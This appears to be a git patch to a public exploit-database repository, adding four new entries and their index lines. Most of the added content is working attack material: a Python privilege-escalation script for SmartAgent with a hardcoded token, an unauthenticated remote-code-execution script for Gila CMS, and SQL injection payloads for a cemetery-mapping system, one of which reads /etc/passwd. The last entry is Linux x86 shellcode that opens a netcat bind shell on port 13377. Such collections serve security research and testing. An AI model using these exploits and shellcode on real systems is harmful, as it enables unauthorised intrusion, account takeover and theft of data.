From 91f4f8025db92802255beee1cdae09c0d7dc794e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 13 Jan 2021 05:01:55 +0000 Subject: [PATCH] DB: 2021-01-13 4 changes to exploits/shellcodes Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated) Cemetry Mapping and Information System 1.0 - Multiple SQL Injections SmartAgent 3.1.0 - Privilege Escalation Linux/x86 - bind shell on port 13377 Shellcode (65 bytes) --- exploits/multiple/webapps/49415.py | 32 ++++++++++++ exploits/php/webapps/49412.py | 20 +++++++ exploits/php/webapps/49413.txt | 83 ++++++++++++++++++++++++++++++ files_exploits.csv | 3 ++ files_shellcodes.csv | 1 + shellcodes/linux/49416.txt | 35 +++++++++++++ 6 files changed, 174 insertions(+) create mode 100755 exploits/multiple/webapps/49415.py create mode 100755 exploits/php/webapps/49412.py create mode 100644 exploits/php/webapps/49413.txt create mode 100644 shellcodes/linux/49416.txt diff --git a/exploits/multiple/webapps/49415.py b/exploits/multiple/webapps/49415.py new file mode 100755 index 000000000..9018330a5 --- /dev/null +++ b/exploits/multiple/webapps/49415.py @@ -0,0 +1,32 @@ +# Exploit Title: SmartAgent 3.1.0 - Privilege Escalation +# Date: 01-11-2021 +# Exploit Author: Orion Hridoy +# Vendor Homepage: https://www.smartagent.io/ +# Version: Build 3.1.0 +# Tested on: Windows 10/Kali Linux + +A Low grade user like ViewOnly can create an account with SuperUser +permission. + +Steps To Reproduce: +1. Create a user with ViewOnly +2. Visit https://demo.localhost.com/#/CampaignManager/users +3. Now you will be able to create an account with SuperUser. + +#Python Exploit [Replace With Your Authorization Code] + +import requests + +session = requests.Session() + +rawBody = "{\"username\":\"orion@hridoy.com +\",\"password\":\"Orionhridoy69\",\"appName\":\"AppEngage\",\"role\":\"Admin\",\"android\":\"1\",\"ios\":\"0\",\"kai\":\"0\"}" +headers = {"Authorization":"id=orion@gmail.com,engageToken=eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJvcmlvbkBnbWFpbC5jb20iLCJyb2xlcyI6WyJWaWV3T25seSJdLCJhcHBOYW1lIjoiQXBwRW5nYWdlIiwicGxhdGZvcm0iOiJBTkRST0lEIiwiaXNzIjoiRU5BR0FHRSIsImlhdCI6MTYxMDM3NDEyMCwiZXhwIjoxNjExMjM4MTIwfQ.SbnZaRe3-2GOFOm7QDzvIBQCKBAK_GV-wKsMoH4GGChyjUFe2Ij4LiVl5rXsWRfTqNnJXj9fFxYTzkD2-kXlAQ","Accept":"application/json, +text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; +rv:52.0) Gecko/20100101 +Firefox/52.0","Referer":"https://demo.localhost.com/","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, +deflate","DNT":"1","Content-Type":"application/json"} +response = session.post("https://demo.localhost.com/api/createUser", +data=rawBody, headers=headers) + +print("User Created With\nUser: orion@hridoy.com\nPass: Orionhridoy69") \ No newline at end of file diff --git a/exploits/php/webapps/49412.py b/exploits/php/webapps/49412.py new file mode 100755 index 000000000..016c9abb6 --- /dev/null +++ b/exploits/php/webapps/49412.py @@ -0,0 +1,20 @@ +# Exploit Title: Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated) +# Date: 1.12.2021 +# Exploit Author: Enesdex +# Vendor Homepage: https://gilacms.com/ +# Software Link: https://github.com/GilaCMS/gila/releases/tag/2.0.0 +# Version: x < 2.0.0 +# Tested on: Windows 10 + +import requests +import time + +target_url = "http://192.168.1.101:80/Gila/" +cmd = "calc.exe" + +url = target_url+"?c=admin" +cookies = {"GSESSIONID": "../../index.php"} +headers = {"User-Agent": ""} +requests.get(url, headers=headers, cookies=cookies) +time.sleep(5) +requests.get(target_url+"/index.php") \ No newline at end of file diff --git a/exploits/php/webapps/49413.txt b/exploits/php/webapps/49413.txt new file mode 100644 index 000000000..9c5d730f2 --- /dev/null +++ b/exploits/php/webapps/49413.txt @@ -0,0 +1,83 @@ +# Exploit Title: Cemetry Mapping and Information System 1.0 - Multiple SQL Injections +# Exploit Author: Mesut Cetin +# Date: 2021-01-12 +# Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html +# Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code +# Affected Version: 1.0 +# Vulnerable parameter: "Search" bar (POST method) +# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0 + +SQL Injection is a type of an injection attack that makes it possible to execute malicious SQL statements. Due to unsanitized user input, the attacker can retrieve the entire SQL database in this case. + +Explanation: + +The function "person.php" takes user input through the search bar at line 45: + +"$_POST['search']" + +and uses it without any sanitization for the following SQL statement (line 46-49): + +$sql = "SELECT * FROM tblpeople WHERE FNAME LIKE '%".$search."%'"; +$mydb->setQuery($sql); +$cur = $mydb->executeQuery(); +$numrows = $mydb->num_rows($cur);//get the number of count + +A single quote (') at the search bar under http://localhost/CemeteryMapping/index.php?q=person will result in SQL synthax errors. + +Proof of Concept: + +Since the php code lacks of sanitization of the user input, multiple SQL injection queries can be found. + +1. Boolean-based SQL injection + +POST request the page /CemeteryMapping/index.php?q=person and use as payload: ' or 1=1 -- + +search=' or 1=1 -- + +2. Union-based SQL injection + +To retrieve sensitive files like /etc/passwd, use the following payload at the search bar (POST request http://localhost/CemeteryMapping/index.php?q=person): + +search=' UNION SELECT NULL,load_file('/etc/passwd'),NULL,NULL,NULL,NULL,NULL-- - + +If you want to enumerate the target system further, replace "load_file('/etc/passwd')" with one of the following MySQL commands: + +@@hostname : Current Hostname + +@@tmpdir : Temp Directory + +@@datadir : Data Directory + +@@version : Version of DB + +@@basedir : Base Directory + +user() : Current User + +database() : Current Database + +version() : Version + +schema() : current Database + +UUID() : System UUID key + +current_user() : Current User + +current_user : Current User + +system_user() : Current System user + +session_user() : Session user + +@@GLOBAL.have_symlink : Check if Symlink is enabled or disabled + +@@GLOBAL.have_ssl : Check if it have SSL or not + +3. Time-based SQL injection + +For time-based SQL injection, use the payload: ' AND (SELECT 2634 FROM (SELECT(SLEEP(5)))muaN)-- - + +Mitigation: + +By using prepared statements and parameterized queries, the SQL injection can be prevented. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 3b4769283..2a040b565 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -43616,3 +43616,6 @@ id,file,description,date,author,type,platform,port 49406,exploits/php/webapps/49406.txt,"WordPress Plugin Custom Global Variables 1.0.5 - 'name' Stored Cross-Site Scripting (XSS)",2021-01-11,"Swapnil Subhash Bodekar",webapps,php, 49407,exploits/php/webapps/49407.txt,"OpenCart 3.0.36 - ATO via Cross Site Request Forgery",2021-01-11,"Mahendra Purbia",webapps,php, 49410,exploits/php/webapps/49410.txt,"Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection",2021-01-11,"Jaimin Gondaliya",webapps,php, +49412,exploits/php/webapps/49412.py,"Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated)",2021-01-12,Enesdex,webapps,php, +49413,exploits/php/webapps/49413.txt,"Cemetry Mapping and Information System 1.0 - Multiple SQL Injections",2021-01-12,"Mesut Cetin",webapps,php, +49415,exploits/multiple/webapps/49415.py,"SmartAgent 3.1.0 - Privilege Escalation",2021-01-12,"Orion Hridoy",webapps,multiple, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index f3c018488..b7887098d 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1025,3 +1025,4 @@ id,file,description,date,author,type,platform 48592,shellcodes/linux_x86/48592.c,"Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes)",2020-06-17,"Xenofon Vassilakopoulos",shellcode,linux_x86 48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",2020-07-26,danf42,shellcode,linux_x86 48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download using mshta.exe Shellcode (100 bytes)",2020-07-26,"Siddharth Sharma",shellcode,windows_x86 +49416,shellcodes/linux/49416.txt,"Linux/x86 - bind shell on port 13377 Shellcode (65 bytes)",2021-01-12,ac3,shellcode,linux diff --git a/shellcodes/linux/49416.txt b/shellcodes/linux/49416.txt new file mode 100644 index 000000000..002d49d00 --- /dev/null +++ b/shellcodes/linux/49416.txt @@ -0,0 +1,35 @@ +# Exploit Title: Linux/x86 - bind shell on port 13377 Shellcode (65 bytes) +# Date: Jan 12, 2021 +# Exploit Author: ac3 +# Version: Linux x86 +# Tested on: Linux x86 + +## linux x86 nc -lvve/bin/sh -p13377 shellcode +## This shellcode will listen on port 13377 using netcat and give /bin/sh to connecting attacker + +# 31 c0 xor %eax,%eax +# 31 d2 xor %edx,%edx +# 50 push eax +# 68 33 33 37 37 push $0x37373333 +# 68 2d 76 70 31 push $0x3170762d +# 89 e2 mov %esp,%edx +# 50 push %eax +# 68 6e 2f 73 68 push $0x68732f6e +# 68 65 2f 62 69 push $0x69622f65 +# 68 2d 6c 76 76 push $0x76766c2d +# 89 e1 mov %esp,%ecx +# 50 push %eax +# 68 2f 2f 6e 63 push $0x636e2f2f +# 68 2f 2f 2f 2f push $0x2f2f2f2f +# 68 2f 62 69 6e push $0x6e69622f +# 89 e3 mov %esp,%ebx +# 50 push %eax +# 52 push %edx +# 51 push %ecx +# 53 push %ebx +# 31 d2 xor %edx,%edx +# 89 e1 mov %esp,%ecx +# b0 0b mov $0xb,%al +# cd 80 int $0x80 + +\x31\xc0\x31\xd2\x50\x68\x33\x33\x37\x37\x68\x2d\x76\x70\x31\x89\xe2\x50\x68\x6e\x2f\x73\x68\x68\x65\x2f\x62\x69\x68\x2d\x6c\x76\x76\x89\xe1\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x2f\x2f\x2f\x68\x2f\x62\x69\x6e\x89\xe3\x50\x52\x51\x53\x31\xd2\x89\xe1\xb0\x0b\xcd\x80 \ No newline at end of file